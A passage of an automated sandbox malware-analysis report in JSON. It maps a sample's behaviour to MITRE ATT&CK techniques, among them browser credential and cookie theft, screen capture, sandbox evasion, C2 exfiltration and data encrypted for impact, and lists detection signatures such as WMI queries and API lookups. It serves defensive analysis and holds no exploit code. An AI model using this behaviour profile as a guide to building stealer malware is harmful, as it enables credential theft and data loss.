"attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials from Web Browsers", "attck_id": "T1555.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}}, {"tactic": "Credential Access", "technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Steal Web Session Cookie", "attck_id": "T1539", "attck_id_wiki": "https://attack.mitre.org/techniques/T1539", "suspicious_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials In Files", "attck_id": "T1552.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1552/001", "malicious_identifiers_count": 1, "parent": {"technique": "Unsecured Credentials", "attck_id": "T1552", "attck_id_wiki": "https://attack.mitre.org/techniques/T1552"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "malicious_identifiers_count": 1, "informative_identifiers_count": 9}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 14}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 3, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Browser Information Discovery", "attck_id": "T1217", "attck_id_wiki": "https://attack.mitre.org/techniques/T1217", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "VNC", "attck_id": "T1021.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "malicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 3, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Email Collection", "attck_id": "T1114.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114/001", "informative_identifiers_count": 1, "parent": {"technique": "Email Collection", "attck_id": "T1114", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114"}}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "malicious_identifiers_count": 3, "suspicious_identifiers_count": 10, "informative_identifiers_count": 3}, {"tactic": "Collection", "technique": "Email Collection", "attck_id": "T1114", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Information Repositories", "attck_id": "T1213", "attck_id_wiki": "https://attack.mitre.org/techniques/T1213", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Asymmetric Cryptography", "attck_id": "T1573.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/002", "suspicious_identifiers_count": 2, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Exfiltration Over C2 Channel", "attck_id": "T1041", "attck_id_wiki": "https://attack.mitre.org/techniques/T1041", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "string-615", "type": 2, "relevance": 1, "name": "Can loads assembly that contains the code that is currently executing [Dotnet]", "description": "Found string \"GetExecutingAssembly\" (Indicator: \"GetExecutingAssembly\"; File: \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229\")\n Found string \"GetExecutingAssembly\" (Indicator: \"GetExecutingAssembly\"; Source: \"00000000-00005916.00000001.66576.01372000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-605", "type": 2, "relevance": 1, "name": "May execute SQL queries", "description": "\"SELECT * FROM win32_operatingsystem\" (Source: cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229, Indicator: \"select * from win32_operatingsystem\")\n \"SELECT * FROM Win32_Processor\" (Source: cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229, Indicator: \"select * from win32_processor\")\n \"Select * From Win32_ComputerSystem\" (Source: cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229, Indicator: \"select * from win32_computersystem\")\n \"SELECT ProcessorId FROM Win32_Processor\" (Source: cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229, Indicator: \"select processorid from win32_processor\")\n \"SELECT * FROM Win32_VideoController\" (Source: cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229, Indicator: \"select * from win32_videocontroller\")\n \"SELECT ExecutablePath, ProcessID FROM Win32_Process\" (Source: 6000470-ProcessList~ProcessExecutablePath, Indicator: \"select executablepath, processid from win32_process\")", "origin": "File/Memory", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\tmpD123.tmp.tmpdb\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter AddDllDirectory (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter RegisterShimImplCallback (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter RegisterShimImplCleanupCallback (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter SetShellShimInstance (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter OnShimDllMainCalled (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter _CorExeMain_RetAddr (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter _CorExeMain (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter UrlIsW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoSizeW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter VerQueryValueW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter SetRuntimeInfo (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetProcessWindowStation (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetUserObjectInformationW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter CreateConfigStream (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter CreateConfigStream_RetAddr (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetNumaHighestNodeNumber (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetSystemWindowsDirectoryW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter InitializeAcl (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter AddAccessAllowedAce (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter AddSIDToBoundaryDescriptor (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter CreateBoundaryDescriptorW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter CreatePrivateNamespaceW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter OpenPrivateNamespaceW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter DeleteBoundaryDescriptor (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter WerRegisterRuntimeExceptionModule (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter RaiseException (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter SetSystemFileCacheSize (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter NtSetSystemInformation (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter PrivIsDllSynchronizationHeld (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetProcessMemoryInfo (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter CoGetContextToken (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetEnabledXStateFeatures (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter sxsJitStartup (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter jitStartup (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter getJit (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter LocaleNameToLCID (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetUserDefaultLocaleName (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter LCIDToLocaleName (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetUserPreferredUILanguages (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPath (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyEx (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetFullPathNameW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter NtQuerySystemInformation (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetDynamicTimeZoneInformation (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter SortGetHandle (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter SortCloseHandle (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter RegQueryValueEx (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetFileMUIPath (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter LoadLibraryEx (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter LoadLibraryExW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter FreeLibraryW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter LoadStringW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter EnumCalendarInfoExEx (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetCalendarInfoEx (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter EnumSystemLocalesEx (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter EnumTimeFormatsEx (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter SetThreadErrorMode (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesEx (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetProcessExecutableHeap (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter GetProcessExecutableHeap_RetAddr (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter BCryptGetFipsAlgorithmMode (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter CryptGetDefaultProviderW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextW (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00005916)\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" called \"GetProcAddress\" with a parameter CryptGenRandom (UID: 00000000-00005916)\n 